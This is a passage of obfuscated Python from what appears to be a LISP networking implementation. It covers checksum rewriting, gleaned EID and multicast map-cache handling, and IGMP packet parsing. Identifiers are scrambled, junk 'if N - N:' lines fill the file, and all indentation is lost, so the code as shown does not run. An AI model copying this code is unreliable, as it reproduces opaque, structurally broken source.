if 89 - 89: IiII - IiII % o0oOOo0O0Ooo * Oo0Ooo % ooOoO0o
if 4 - 4: OoO0O00 % II111iiii / I11i
if 95 - 95: I1Ii111 - I1Ii111 - iII111i + IiII . OoO0O00
if 5 - 5: i11iIiiIii - O0 % ooOoO0o
if 55 - 55: II111iiii
oo00 = 2 if packet . inner_version == 4 else 4
I1iIiI11iiI = 20 + Ooo000O00 if packet . inner_version == 4 else Ooo000O00
iiI1 = struct . pack ( "H" , socket . htons ( I1iIiI11iiI ) )
O0OOOO = O0OOOO [ 0 : oo00 ] + iiI1 + O0OOOO [ oo00 + 2 : : ]
if 88 - 88: i11iIiiIii / oO0o - i1IIi / I1IiiI
if 57 - 57: oO0o + O0 * I11i
if 87 - 87: o0oOOo0O0Ooo % Oo0Ooo * I1ii11iIi11i / OoooooooOO / o0oOOo0O0Ooo
if 78 - 78: Ii1I
if ( packet . inner_version == 4 ) :
I1i11i = struct . pack ( "H" , 0 )
O0OOOO = O0OOOO [ 0 : 10 ] + I1i11i + O0OOOO [ 12 : : ]
iiI1 = lisp_ip_checksum ( O0OOOO [ 0 : 20 ] )
O0OOOO = iiI1 + O0OOOO [ 20 : : ]
if 5 - 5: i1IIi * ooOoO0o / OoOoOO00 % i11iIiiIii
if 57 - 57: IiII
if 89 - 89: I1ii11iIi11i - I1Ii111 + o0oOOo0O0Ooo
if 62 - 62: I1ii11iIi11i + OoooooooOO * OOooOOo
if 49 - 49: i1IIi - I11i * II111iiii
packet . packet = O0OOOO + IiiIi1I
return ( True )
if 4 - 4: o0oOOo0O0Ooo + o0oOOo0O0Ooo
if 57 - 57: I1IiiI * OOooOOo . i11iIiiIii * oO0o - OoOoOO00
if 35 - 35: O0
if 65 - 65: Oo0Ooo
if 100 - 100: I1Ii111 . o0oOOo0O0Ooo * OoooooooOO . o0oOOo0O0Ooo
if 90 - 90: i11iIiiIii . I1IiiI + ooOoO0o * OoooooooOO * OoooooooOO + oO0o
if 77 - 77: OOooOOo * OoOoOO00
if 75 - 75: Oo0Ooo * Oo0Ooo - IiII - OoOoOO00 / i11iIiiIii + I1Ii111
if 57 - 57: i11iIiiIii / oO0o
if 37 - 37: o0oOOo0O0Ooo + OoOoOO00 - i1IIi . Oo0Ooo
def lisp_allow_gleaning ( eid , group , rloc ) :
if ( lisp_glean_mappings == [ ] ) : return ( False , False , False )
if 3 - 3: ooOoO0o % OoooooooOO / I1Ii111 + oO0o - O0
for oo0O00OOOOO in lisp_glean_mappings :
if ( "instance-id" in oo0O00OOOOO ) :
oooo = eid . instance_id
I1iO00O , i1iiI11 = oo0O00OOOOO [ "instance-id" ]
if ( oooo < I1iO00O or oooo > i1iiI11 ) : continue
if 72 - 72: oO0o * OoO0O00
if ( "eid-prefix" in oo0O00OOOOO ) :
oO0ooOOO = copy . deepcopy ( oo0O00OOOOO [ "eid-prefix" ] )
oO0ooOOO . instance_id = eid . instance_id
if ( eid . is_more_specific ( oO0ooOOO ) == False ) : continue
if 89 - 89: OoooooooOO . OOooOOo
if ( "group-prefix" in oo0O00OOOOO ) :
if ( group == None ) : continue
Oo = copy . deepcopy ( oo0O00OOOOO [ "group-prefix" ] )
Oo . instance_id = group . instance_id
if ( group . is_more_specific ( Oo ) == False ) : continue
if 96 - 96: o0oOOo0O0Ooo + OoOoOO00 / i11iIiiIii - o0oOOo0O0Ooo * i11iIiiIii + OOooOOo
if ( "rloc-prefix" in oo0O00OOOOO ) :
if ( rloc != None and rloc . is_more_specific ( oo0O00OOOOO [ "rloc-prefix" ] )
== False ) : continue
if 16 - 16: IiII / I1Ii111 . II111iiii * I11i
return ( True , oo0O00OOOOO [ "rloc-probe" ] , oo0O00OOOOO [ "igmp-query" ] )
if 33 - 33: I1ii11iIi11i / Oo0Ooo % i11iIiiIii
return ( False , False , False )
if 37 - 37: Oo0Ooo - I1Ii111 - IiII / oO0o % I1IiiI / I1Ii111
if 80 - 80: iII111i - oO0o % i1IIi * iIii1I11I1II1 . oO0o
if 86 - 86: Ii1I
if 36 - 36: i11iIiiIii % i11iIiiIii
if 91 - 91: Oo0Ooo + I1Ii111 % iII111i
if 7 - 7: I1Ii111 + II111iiii
if 63 - 63: OoO0O00 - o0oOOo0O0Ooo / iII111i % II111iiii * IiII
def lisp_build_gleaned_multicast ( seid , geid , rloc , port , igmp ) :
IIiI11I1I1i1i = geid . print_address ( )
ooooooo0O0oo = seid . print_address_no_iid ( )
I111 = green ( "{}" . format ( ooooooo0O0oo ) , False )
oO0ooOOO = green ( "(*, {})" . format ( IIiI11I1I1i1i ) , False )
iiiI1I = red ( rloc . print_address_no_iid ( ) + ":" + str ( port ) , False )
if 15 - 15: oO0o % OoooooooOO % Ii1I + i1IIi
if 98 - 98: OoO0O00 - i11iIiiIii / O0 / I1IiiI
if 99 - 99: I1IiiI / oO0o . OoO0O00 / ooOoO0o + IiII
if 3 - 3: II111iiii . OOooOOo * i11iIiiIii / I11i
I11iiI1III = lisp_map_cache_lookup ( seid , geid )
if ( I11iiI1III == None ) :
I11iiI1III = lisp_mapping ( "" , "" , [ ] )
I11iiI1III . group . copy_address ( geid )
I11iiI1III . eid . copy_address ( geid )
I11iiI1III . eid . address = 0
I11iiI1III . eid . mask_len = 0
I11iiI1III . mapping_source . copy_address ( rloc )
I11iiI1III . map_cache_ttl = LISP_IGMP_TTL
I11iiI1III . gleaned = True
I11iiI1III . add_cache ( )
lprint ( "Add gleaned EID {} to map-cache" . format ( oO0ooOOO ) )
if 16 - 16: I1ii11iIi11i - ooOoO0o + OoO0O00 . I11i / O0
if 56 - 56: I1IiiI + Oo0Ooo * II111iiii + iIii1I11I1II1
if 56 - 56: o0oOOo0O0Ooo * I1IiiI - I11i * I1Ii111 - I11i
if 92 - 92: oO0o % iIii1I11I1II1 * o0oOOo0O0Ooo * OoooooooOO - iIii1I11I1II1
if 51 - 51: Ii1I - OoO0O00 + i1IIi
if 11 - 11: II111iiii - iII111i + oO0o % Oo0Ooo
OOOoOoo = o0oOOO0o0o0o = iIIi = None
if ( I11iiI1III . rloc_set != [ ] ) :
OOOoOoo = I11iiI1III . rloc_set [ 0 ]
if ( OOOoOoo . rle ) :
o0oOOO0o0o0o = OOOoOoo . rle
for i1Ii1ii in o0oOOO0o0o0o . rle_nodes :
if ( i1Ii1ii . rloc_name != ooooooo0O0oo ) : continue
iIIi = i1Ii1ii
break
if 24 - 24: oO0o % OoooooooOO % OoOoOO00 * i11iIiiIii
if 65 - 65: O0 % O0 . II111iiii * i11iIiiIii
if 39 - 39: II111iiii + Ii1I
if 60 - 60: I1ii11iIi11i * O0 * OoOoOO00 * i1IIi
if 6 - 6: OoOoOO00
if 7 - 7: i1IIi + II111iiii
if 96 - 96: I1Ii111 / OoO0O00
if ( OOOoOoo == None ) :
OOOoOoo = lisp_rloc ( )
I11iiI1III . rloc_set = [ OOOoOoo ]
OOOoOoo . priority = 253
OOOoOoo . mpriority = 255
I11iiI1III . build_best_rloc_set ( )
if 27 - 27: Ii1I
if ( o0oOOO0o0o0o == None ) :
o0oOOO0o0o0o = lisp_rle ( geid . print_address ( ) )
OOOoOoo . rle = o0oOOO0o0o0o
if 90 - 90: I1ii11iIi11i
if ( iIIi == None ) :
iIIi = lisp_rle_node ( )
iIIi . rloc_name = ooooooo0O0oo
o0oOOO0o0o0o . rle_nodes . append ( iIIi )
o0oOOO0o0o0o . build_forwarding_list ( )
lprint ( "Add RLE {} from {} for gleaned EID {}" . format ( iiiI1I , I111 , oO0ooOOO ) )
elif ( rloc . is_exact_match ( iIIi . address ) == False or
port != iIIi . translated_port ) :
lprint ( "Changed RLE {} from {} for gleaned EID {}" . format ( iiiI1I , I111 , oO0ooOOO ) )
if 43 - 43: OoO0O00 . I1IiiI . oO0o + Ii1I
if 7 - 7: iII111i / Oo0Ooo - OoO0O00 + I1Ii111 * II111iiii * ooOoO0o
if 80 - 80: oO0o - i1IIi / I11i . II111iiii % O0 % I11i
if 70 - 70: iIii1I11I1II1 * i1IIi * OOooOOo - Oo0Ooo % i1IIi
if 60 - 60: o0oOOo0O0Ooo . OOooOOo % II111iiii - I1ii11iIi11i
iIIi . store_translated_rloc ( rloc , port )
if 4 - 4: OOooOOo % ooOoO0o
if 39 - 39: Ii1I
if 67 - 67: iIii1I11I1II1 - OOooOOo
if 47 - 47: OOooOOo - OOooOOo * I1Ii111
if 24 - 24: I1ii11iIi11i
if ( igmp ) :
IiIiI11111i1i = seid . print_address ( )
if ( IiIiI11111i1i not in lisp_gleaned_groups ) :
lisp_gleaned_groups [ IiIiI11111i1i ] = { }
if 37 - 37: II111iiii - iIii1I11I1II1 / o0oOOo0O0Ooo . O0 + II111iiii
lisp_gleaned_groups [ IiIiI11111i1i ] [ IIiI11I1I1i1i ] = lisp_get_timestamp ( )
if 9 - 9: o0oOOo0O0Ooo
if 47 - 47: Ii1I * I1Ii111 / II111iiii
if 73 - 73: ooOoO0o
if 53 - 53: IiII . Oo0Ooo
if 54 - 54: i11iIiiIii % ooOoO0o % I1Ii111 + o0oOOo0O0Ooo
if 2 - 2: IiII
if 25 - 25: OoOoOO00 . OoO0O00 * o0oOOo0O0Ooo . OoooooooOO - Oo0Ooo + I1IiiI
if 82 - 82: OoO0O00 - Ii1I * I11i * o0oOOo0O0Ooo
def lisp_remove_gleaned_multicast ( seid , geid ) :
if 17 - 17: OoooooooOO + I1Ii111
if 91 - 91: iIii1I11I1II1 % i11iIiiIii - o0oOOo0O0Ooo
if 98 - 98: o0oOOo0O0Ooo % II111iiii * IiII - i11iIiiIii * oO0o
if 15 - 15: O0 - II111iiii - Oo0Ooo . I1ii11iIi11i % OoO0O00
I11iiI1III = lisp_map_cache_lookup ( seid , geid )
if ( I11iiI1III == None ) : return
if 63 - 63: o0oOOo0O0Ooo / OoOoOO00 % I1ii11iIi11i % I11i
ooo0o0O = I11iiI1III . rloc_set [ 0 ] . rle
if ( ooo0o0O == None ) : return
if 58 - 58: O0 + iII111i
oOo = seid . print_address_no_iid ( )
III11i1 = False
for iIIi in ooo0o0O . rle_nodes :
if ( iIIi . rloc_name == oOo ) :
III11i1 = True
break
if 66 - 66: i1IIi . O0 . i1IIi - iIii1I11I1II1 - ooOoO0o % I1ii11iIi11i
if 96 - 96: i1IIi + oO0o - OoOoOO00 - OoOoOO00
if ( III11i1 == False ) : return
if 13 - 13: I11i
if 52 - 52: iII111i . OoOoOO00 * iIii1I11I1II1 . iII111i * IiII
if 52 - 52: iII111i + iII111i
if 35 - 35: I1Ii111 * oO0o + Ii1I / I1IiiI + O0 - I11i
ooo0o0O . rle_nodes . remove ( iIIi )
ooo0o0O . build_forwarding_list ( )
if 42 - 42: o0oOOo0O0Ooo
IIiI11I1I1i1i = geid . print_address ( )
IiIiI11111i1i = seid . print_address ( )
I111 = green ( "{}" . format ( IiIiI11111i1i ) , False )
oO0ooOOO = green ( "(*, {})" . format ( IIiI11I1I1i1i ) , False )
lprint ( "Gleaned EID {} RLE removed for {}" . format ( oO0ooOOO , I111 ) )
if 89 - 89: o0oOOo0O0Ooo
if 99 - 99: I1ii11iIi11i + Oo0Ooo
if 20 - 20: OoO0O00 / iII111i
if 62 - 62: i1IIi % iIii1I11I1II1 + OoOoOO00 - I1IiiI . I1ii11iIi11i
if ( IiIiI11111i1i in lisp_gleaned_groups ) :
if ( IIiI11I1I1i1i in lisp_gleaned_groups [ IiIiI11111i1i ] ) :
lisp_gleaned_groups [ IiIiI11111i1i ] . pop ( IIiI11I1I1i1i )
if 92 - 92: i11iIiiIii * o0oOOo0O0Ooo . Oo0Ooo
if 15 - 15: o0oOOo0O0Ooo * IiII . iII111i % O0 . iIii1I11I1II1
if 34 - 34: OOooOOo / iII111i * iIii1I11I1II1 + i11iIiiIii
if 37 - 37: I11i + o0oOOo0O0Ooo . o0oOOo0O0Ooo
if 8 - 8: Oo0Ooo * Ii1I % I11i - OoooooooOO
if 11 - 11: OoO0O00 - oO0o
if ( ooo0o0O . rle_nodes == [ ] ) :
I11iiI1III . delete_cache ( )
lprint ( "Gleaned EID {} remove, no more RLEs" . format ( oO0ooOOO ) )
if 50 - 50: II111iiii * IiII
if 26 - 26: OoO0O00 . II111iiii
if 19 - 19: iII111i / i11iIiiIii
if 31 - 31: I1Ii111 / I1Ii111 % IiII
if 68 - 68: O0 / OOooOOo % OoOoOO00
if 68 - 68: OoooooooOO - IiII + I1IiiI * IiII / I11i - OoO0O00
if 69 - 69: oO0o / II111iiii
if 56 - 56: i1IIi + II111iiii + Ii1I . OoooooooOO
def lisp_change_gleaned_multicast ( seid , rloc , port ) :
IiIiI11111i1i = seid . print_address ( )
if ( IiIiI11111i1i not in lisp_gleaned_groups ) : return
if 26 - 26: OoooooooOO % Ii1I % I11i * oO0o - i1IIi - i1IIi
for oo0oOooo0O in lisp_gleaned_groups [ IiIiI11111i1i ] :
lisp_geid . store_address ( oo0oOooo0O )
lisp_build_gleaned_multicast ( seid , lisp_geid , rloc , port , False )
if 76 - 76: i11iIiiIii + OoO0O00 - iII111i . OoOoOO00 * Oo0Ooo
if 15 - 15: II111iiii + iIii1I11I1II1
if 100 - 100: OOooOOo
if 43 - 43: OoO0O00 + I1Ii111 + OoOoOO00
if 78 - 78: I11i
if 30 - 30: iIii1I11I1II1
if 74 - 74: I1IiiI - Oo0Ooo - i1IIi . iIii1I11I1II1 - I11i
if 57 - 57: I1IiiI - i11iIiiIii - I1ii11iIi11i
if 49 - 49: i1IIi . O0 % Ii1I * i1IIi
if 39 - 39: I1ii11iIi11i
if 74 - 74: II111iiii % oO0o * Oo0Ooo / iIii1I11I1II1
if 81 - 81: II111iiii + OoOoOO00 * O0
if 64 - 64: iIii1I11I1II1 * Ii1I
if 5 - 5: I11i . I11i / i1IIi - o0oOOo0O0Ooo % Oo0Ooo
if 85 - 85: OOooOOo
if 32 - 32: iII111i
if 27 - 27: iIii1I11I1II1 - iII111i
if 68 - 68: oO0o + OoooooooOO - i1IIi * OoOoOO00 % Oo0Ooo
if 19 - 19: IiII * Oo0Ooo + I1IiiI * I1Ii111 % iIii1I11I1II1
if 15 - 15: II111iiii % OoO0O00 % Oo0Ooo + I1Ii111
if 54 - 54: I1Ii111 + OOooOOo
if 6 - 6: Ii1I
if 8 - 8: OoO0O00
if 91 - 91: Ii1I
if 12 - 12: OoooooooOO + i11iIiiIii
if 63 - 63: OOooOOo . i11iIiiIii
if 50 - 50: IiII % i11iIiiIii - iII111i . OoOoOO00 / Oo0Ooo
if 30 - 30: Oo0Ooo . II111iiii + OoooooooOO % OoO0O00 * ooOoO0o * iIii1I11I1II1
if 91 - 91: OoooooooOO
if 86 - 86: iII111i / OoooooooOO - I1ii11iIi11i
if 63 - 63: ooOoO0o % Ii1I * I1IiiI
if 48 - 48: iII111i - iII111i - o0oOOo0O0Ooo + ooOoO0o - o0oOOo0O0Ooo / Ii1I
if 43 - 43: I1IiiI + Ii1I
if 37 - 37: OoOoOO00 - OoooooooOO . ooOoO0o - IiII % iIii1I11I1II1 . iIii1I11I1II1
if 64 - 64: OoOoOO00 + iII111i % I1Ii111 - OOooOOo + O0
if 83 - 83: I1Ii111 + I1Ii111
if 43 - 43: oO0o * i1IIi * Ii1I . iIii1I11I1II1 % o0oOOo0O0Ooo
if 97 - 97: I1IiiI . i1IIi * OoOoOO00 / OOooOOo
if 50 - 50: II111iiii . OoO0O00
if 60 - 60: I11i . iIii1I11I1II1
if 41 - 41: II111iiii / I1IiiI
if 2 - 2: IiII / OoOoOO00 + I11i
if 3 - 3: OoooooooOO + Oo0Ooo + OOooOOo
if 20 - 20: Ii1I - oO0o - OoO0O00 + I1ii11iIi11i % OoO0O00 . i1IIi
if 2 - 2: ooOoO0o * IiII . Ii1I
if 69 - 69: IiII % i1IIi
if 17 - 17: o0oOOo0O0Ooo . OoO0O00 * ooOoO0o * II111iiii - OoooooooOO % iII111i
if 47 - 47: I1IiiI * iIii1I11I1II1 - I11i - o0oOOo0O0Ooo
if 47 - 47: IiII + OoO0O00 % ooOoO0o - iII111i - IiII - oO0o
if 63 - 63: OoooooooOO / I1Ii111
if 90 - 90: I1Ii111 . i11iIiiIii - iIii1I11I1II1 + I1Ii111
if 67 - 67: IiII - I1ii11iIi11i + ooOoO0o . iIii1I11I1II1 . IiII
if 13 - 13: I1IiiI / i11iIiiIii % iIii1I11I1II1 - Oo0Ooo . i11iIiiIii + I1IiiI
if 77 - 77: o0oOOo0O0Ooo / II111iiii + i11iIiiIii % Ii1I . iIii1I11I1II1
if 66 - 66: iII111i / oO0o - OoO0O00 . Oo0Ooo
if 31 - 31: IiII % O0
if 46 - 46: iIii1I11I1II1 - OoooooooOO . oO0o % iIii1I11I1II1 / i1IIi + Ii1I
if 5 - 5: I1ii11iIi11i % II111iiii
if 17 - 17: i11iIiiIii - II111iiii / O0 % OoO0O00 . Oo0Ooo + IiII
if 60 - 60: I11i % I1IiiI
if 99 - 99: oO0o . OOooOOo % iII111i * Ii1I
if 98 - 98: Oo0Ooo * O0 + i1IIi
if 41 - 41: i1IIi % OoO0O00 * iIii1I11I1II1
if 2 - 2: I1ii11iIi11i * iII111i . iIii1I11I1II1 * Oo0Ooo
if 34 - 34: i11iIiiIii % O0 . I1IiiI / ooOoO0o + OoO0O00
if 28 - 28: Ii1I / iIii1I11I1II1
if 41 - 41: iIii1I11I1II1
if 57 - 57: I1Ii111 * o0oOOo0O0Ooo - o0oOOo0O0Ooo * I11i
if 89 - 89: Ii1I % O0
if 81 - 81: OoooooooOO / II111iiii - ooOoO0o
if 14 - 14: O0
if 59 - 59: I11i % II111iiii . iIii1I11I1II1 * oO0o % Ii1I
if 79 - 79: OoooooooOO . II111iiii
if 55 - 55: II111iiii
if 2 - 2: I1ii11iIi11i * i1IIi + OOooOOo / OoO0O00 % OoOoOO00 / O0
if 47 - 47: OoooooooOO - i11iIiiIii - IiII * O0 * iII111i * Ii1I
if 36 - 36: I1Ii111
if 85 - 85: Oo0Ooo % OOooOOo
if 10 - 10: O0 + Oo0Ooo + Ii1I % IiII
if 89 - 89: oO0o / iII111i + OOooOOo
if 27 - 27: Ii1I / o0oOOo0O0Ooo % I11i
if 96 - 96: i11iIiiIii % O0
if 11 - 11: II111iiii . i11iIiiIii % ooOoO0o * Ii1I * OoOoOO00 * OoooooooOO
if 80 - 80: OoO0O00
if 55 - 55: iIii1I11I1II1 % OoO0O00 / II111iiii - OoO0O00
if 95 - 95: o0oOOo0O0Ooo / OOooOOo * OOooOOo * O0
if 93 - 93: OOooOOo / ooOoO0o
if 89 - 89: OoooooooOO + iIii1I11I1II1 / I1ii11iIi11i % iIii1I11I1II1 / iII111i
if 74 - 74: Ii1I + I1IiiI * iII111i / i11iIiiIii - ooOoO0o * OoooooooOO
if 98 - 98: I1IiiI
if 85 - 85: OoooooooOO * i1IIi * O0 * OoooooooOO . IiII
if 22 - 22: ooOoO0o
igmp_types = { 17 : "IGMP-query" , 18 : "IGMPv1-report" , 19 : "DVMRP" ,
20 : "PIMv1" , 22 : "IGMPv2-report" , 23 : "IGMPv2-leave" ,
30 : "mtrace-response" , 31 : "mtrace-request" , 34 : "IGMPv3-report" }
if 44 - 44: I1ii11iIi11i + IiII + IiII * I1ii11iIi11i - OoooooooOO / I1Ii111
lisp_igmp_record_types = { 1 : "include-mode" , 2 : "exclude-mode" ,
3 : "change-to-include" , 4 : "change-to-exclude" , 5 : "allow-new-source" ,
6 : "block-old-sources" }
if 3 - 3: I1ii11iIi11i + o0oOOo0O0Ooo * I11i / Oo0Ooo
def lisp_process_igmp_packet ( packet ) :
O0oo0OoO0oo = lisp_address ( LISP_AFI_IPV4 , "" , 32 , 0 )
O0oo0OoO0oo . address = socket . ntohl ( struct . unpack ( "I" , packet [ 12 : 16 ] ) [ 0 ] )
O0oo0OoO0oo = bold ( "from {}" . format ( O0oo0OoO0oo . print_address_no_iid ( ) ) , False )
if 31 - 31: i11iIiiIii % OoO0O00 - oO0o / o0oOOo0O0Ooo % O0
iiiI1I = bold ( "Receive" , False )
lprint ( "{} {}-byte {}, IGMP packet: {}" . format ( iiiI1I , len ( packet ) , O0oo0OoO0oo ,
lisp_format_packet ( packet ) ) )
if 53 - 53: iIii1I11I1II1 * I1ii11iIi11i
if 46 - 46: OOooOOo % OoOoOO00 * iII111i
if 55 - 55: I1IiiI * iIii1I11I1II1 . OoOoOO00
if 82 - 82: iIii1I11I1II1 - iII111i % I1IiiI + I1IiiI * i1IIi % O0
ooOOoO = ( struct . unpack ( "B" , packet [ 0 : 1 ] ) [ 0 ] & 0x0f ) * 4
if 95 - 95: OoO0O00 * ooOoO0o * oO0o % Oo0Ooo
if 36 - 36: I1IiiI - Ii1I + oO0o . iIii1I11I1II1
if 47 - 47: Ii1I
if 12 - 12: I1IiiI / IiII + OoOoOO00 . I1Ii111 / I1Ii111
OOo00OoO = packet [ ooOOoO : : ]
oooo00O00oOo = struct . unpack ( "B" , OOo00OoO [ 0 : 1 ] ) [ 0 ]
if 31 - 31: O0 % OoO0O00 % O0 + iII111i - iIii1I11I1II1
if 71 - 71: I1IiiI / Ii1I + IiII * OoooooooOO
if 39 - 39: OoO0O00
if 60 - 60: iII111i . iII111i - ooOoO0o / i1IIi
if 68 - 68: oO0o + I11i + Oo0Ooo / OOooOOo . II111iiii - iIii1I11I1II1
oo0oOooo0O = lisp_address ( LISP_AFI_IPV4 , "" , 32 , 0 )
oo0oOooo0O . address = socket . ntohl ( struct . unpack ( "II" , OOo00OoO [ : 8 ] ) [ 1 ] )
IIiI11I1I1i1i = oo0oOooo0O . print_address_no_iid ( )
if 81 - 81: I1ii11iIi11i
if ( oooo00O00oOo == 17 ) :
lprint ( "IGMP Query for group {}" . format ( IIiI11I1I1i1i ) )
return ( True )
if 39 - 39: II111iiii
if 60 - 60: OoOoOO00 % Oo0Ooo
IiIi1i = ( oooo00O00oOo in ( 0x12 , 0x16 , 0x17 , 0x22 ) )
if ( IiIi1i == False ) :
o0oIIi1i = "{} ({})" . format ( oooo00O00oOo , igmp_types [ oooo00O00oOo ] ) if ( oooo00O00oOo in igmp_types ) else oooo00O00oOo
if 81 - 81: O0 . iII111i
lprint ( "IGMP type {} not supported" . format ( o0oIIi1i ) )
return ( [ ] )
if 27 - 27: OoooooooOO . i1IIi + OoO0O00 + IiII % ooOoO0o
if 88 - 88: OoooooooOO
if ( len ( OOo00OoO ) < 8 ) :
lprint ( "IGMP message too small" )
return ( [ ] )
if 22 - 22: OoOoOO00 / i1IIi - i1IIi - Oo0Ooo - O0 / IiII
if 11 - 11: oO0o + oO0o . Ii1I . OoooooooOO * i1IIi - I1IiiI
if 69 - 69: I1Ii111 * ooOoO0o * II111iiii * i11iIiiIii
if 88 - 88: oO0o - o0oOOo0O0Ooo * i11iIiiIii % OoO0O00
if 62 - 62: OoOoOO00 / iII111i
if ( oooo00O00oOo == 0x17 ) :
lprint ( "IGMPv2 leave (*, {})" . format ( bold ( IIiI11I1I1i1i , False ) ) )
return ( [ [ None , IIiI11I1I1i1i , False ] ] )
if 70 - 70: IiII / O0 - i1IIi
if ( oooo00O00oOo in ( 0x12 , 0x16 ) ) :
lprint ( "IGMPv{} join (*, {})" . format ( 1 if ( oooo00O00oOo == 0x12 ) else 2 , bold ( IIiI11I1I1i1i , False ) ) )
if 23 - 23: OoOoOO00
if 2 - 2: II111iiii * OoOoOO00 . iIii1I11I1II1 . ooOoO0o . ooOoO0o + iII111i
if 60 - 60: I1ii11iIi11i / I1ii11iIi11i
if 44 - 44: i11iIiiIii / ooOoO0o - iIii1I11I1II1 + OoO0O00
if 62 - 62: i1IIi / I1Ii111 + ooOoO0o
if ( IIiI11I1I1i1i . find ( "224.0.0." ) != - 1 ) :
lprint ( "Suppress registration for link-local groups" )
else :
return ( [ [ None , IIiI11I1I1i1i , True ] ] )
if 80 - 80: iII111i + OoO0O00 % OoO0O00
if 4 - 4: OoOoOO00 * I11i * O0 . OoooooooOO + Ii1I % i1IIi
if 11 - 11: OoOoOO00 % i11iIiiIii . OoOoOO00 % Oo0Ooo * Ii1I
if 67 - 67: IiII - OoOoOO00 / I1Ii111 % oO0o % OOooOOo
if 19 - 19: OoO0O00 - iII111i
return ( [ ] )
if 76 - 76: OoOoOO00 * ooOoO0o - iII111i * I1IiiI + I11i
if 4 - 4: Oo0Ooo
if 95 - 95: Oo0Ooo * i11iIiiIii - O0
if 100 - 100: iIii1I11I1II1 / I1ii11iIi11i - o0oOOo0O0Ooo / iII111i
if 73 - 73: OoooooooOO
oo0OOo00OOoO = oo0oOooo0O . address
OOo00OoO = OOo00OoO [ 8 : : ]
if 68 - 68: II111iiii / i11iIiiIii % i11iIiiIii % OoooooooOO
Ooooo0o = "BBHI"
IiiIIIIiI1 = struct . calcsize ( Ooooo0o )
IiII1i = "I"
o00iiI1i1 = struct . calcsize ( IiII1i )
O0oo0OoO0oo = lisp_address ( LISP_AFI_IPV4 , "" , 32 , 0 )
if 21 - 21: II111iiii - o0oOOo0O0Ooo * OoO0O00 . OOooOOo
if 65 - 65: o0oOOo0O0Ooo + I1IiiI
if 21 - 21: I1Ii111
if 74 - 74: iII111i
OoOiI1I = [ ]
for iIi1iIIIiIiI in range ( oo0OOo00OOoO ) :
if ( len ( OOo00OoO ) < IiiIIIIiI1 ) : return
o0ooO0oooO0 , Oo0OoO00O , I1Iiii11iiI , I1IIIi = struct . unpack ( Ooooo0o ,
OOo00OoO [ : IiiIIIIiI1 ] )
if 28 - 28: OoooooooOO
OOo00OoO = OOo00OoO [ IiiIIIIiI1 : : ]
if 45 - 45: ooOoO0o / I1ii11iIi11i . Ii1I - iIii1I11I1II1 . OoooooooOO
if ( o0ooO0oooO0 not in lisp_igmp_record_types ) :
lprint ( "Invalid record type {}" . format ( o0ooO0oooO0 ) )
continue
if 80 - 80: I11i % I1Ii111 - OOooOOo . I11i + I1Ii111
if 9 - 9: II111iiii - i11iIiiIii . i11iIiiIii % I1ii11iIi11i
o00oOO00oO = lisp_igmp_record_types [ o0ooO0oooO0 ]
I1Iiii11iiI = socket . ntohs ( I1Iiii11iiI )
oo0oOooo0O . address = socket . ntohl ( I1IIIi )
IIiI11I1I1i1i = oo0oOooo0O . print_address_no_iid ( )
if 88 - 88: OoOoOO00 . O0
lprint ( "Record type: {}, group: {}, source-count: {}" . format ( o00oOO00oO , IIiI11I1I1i1i , I1Iiii11iiI ) )
if 47 - 47: I1Ii111 * iIii1I11I1II1 % OoO0O00
if 48 - 48: i11iIiiIii
if 15 - 15: oO0o - OoO0O00 . I1ii11iIi11i * oO0o / OoOoOO00
if 89 - 89: OoO0O00 / oO0o % I11i - I1ii11iIi11i . o0oOOo0O0Ooo
if 46 - 46: i11iIiiIii
if 99 - 99: i11iIiiIii / oO0o / OoOoOO00 / O0 * I1ii11iIi11i
if 72 - 72: ooOoO0o - I1Ii111 - iIii1I11I1II1 . I1IiiI
oOOOOoOo00OoO = False
if ( o0ooO0oooO0 in ( 1 , 5 ) ) : oOOOOoOo00OoO = True
if ( o0ooO0oooO0 in ( 2 , 4 ) and I1Iiii11iiI == 0 ) : oOOOOoOo00OoO = True
OoO0oOOo = "join" if ( oOOOOoOo00OoO ) else "leave"
if 50 - 50: OoooooooOO . o0oOOo0O0Ooo . IiII . OOooOOo * I1ii11iIi11i
if 67 - 67: I11i % IiII + O0 + iIii1I11I1II1 % OoooooooOO / ooOoO0o
if 80 - 80: OOooOOo - i11iIiiIii . OoooooooOO % OoO0O00 + OoO0O00
if 24 - 24: Ii1I . OOooOOo . IiII / Oo0Ooo . Oo0Ooo . II111iiii
if ( IIiI11I1I1i1i . find ( "224.0.0." ) != - 1 ) :
lprint ( "Suppress registration for link-local groups" )
continue
if 63 - 63: ooOoO0o . I11i
if 39 - 39: II111iiii % oO0o % I1IiiI - iIii1I11I1II1 / I1IiiI
if 94 - 94: iII111i + oO0o
if 43 - 43: iIii1I11I1II1 + iIii1I11I1II1
if 8 - 8: iIii1I11I1II1
if 30 - 30: OOooOOo - I1ii11iIi11i * iIii1I11I1II1 + Oo0Ooo
if 25 - 25: IiII
if 78 - 78: OoOoOO00 * iIii1I11I1II1 * ooOoO0o - OoooooooOO - IiII
if ( I1Iiii11iiI == 0 ) :
OoOiI1I . append ( [ None , IIiI11I1I1i1i , oOOOOoOo00OoO ] )
lprint ( "IGMPv3 {} (*, {})" . format ( bold ( OoO0oOOo , False ) ,
bold ( IIiI11I1I1i1i , False ) ) )
if 40 - 40: OoO0O00 . i11iIiiIii + ooOoO0o
if 30 - 30: OOooOOo . OoO0O00 % iII111i - OoO0O00 % i11iIiiIii
if 28 - 28: Ii1I + Oo0Ooo / iIii1I11I1II1
if 57 - 57: o0oOOo0O0Ooo
if 23 - 23: II111iiii
for I1I1II1iI in range ( I1Iiii11iiI ) :
if ( len ( OOo00OoO ) < o00iiI1i1 ) : return
I1IIIi = struct . unpack ( IiII1i , OOo00OoO [ : o00iiI1i1 ] ) [ 0 ]
O0oo0OoO0oo . address = socket . ntohl ( I1IIIi )
Oo0o = O0oo0OoO0oo . print_address_no_iid ( )
OoOiI1I . append ( [ Oo0o , IIiI11I1I1i1i , oOOOOoOo00OoO ] )
lprint ( "{} ({}, {})" . format ( OoO0oOOo ,
green ( Oo0o , False ) , bold ( IIiI11I1I1i1i , False ) ) )
OOo00OoO = OOo00OoO [ o00iiI1i1 : : ]
if 53 - 53: oO0o
if 62 - 62: O0 + O0 . Oo0Ooo + iIii1I11I1II1 + iII111i
if 97 - 97: oO0o - iIii1I11I1II1
if 61 - 61: II111iiii / OOooOOo - oO0o
if 19 - 19: O0
if 60 - 60: I1ii11iIi11i * I1ii11iIi11i + I1Ii111 + o0oOOo0O0Ooo - OoO0O00
if 75 - 75: o0oOOo0O0Ooo + i11iIiiIii % I1ii11iIi11i
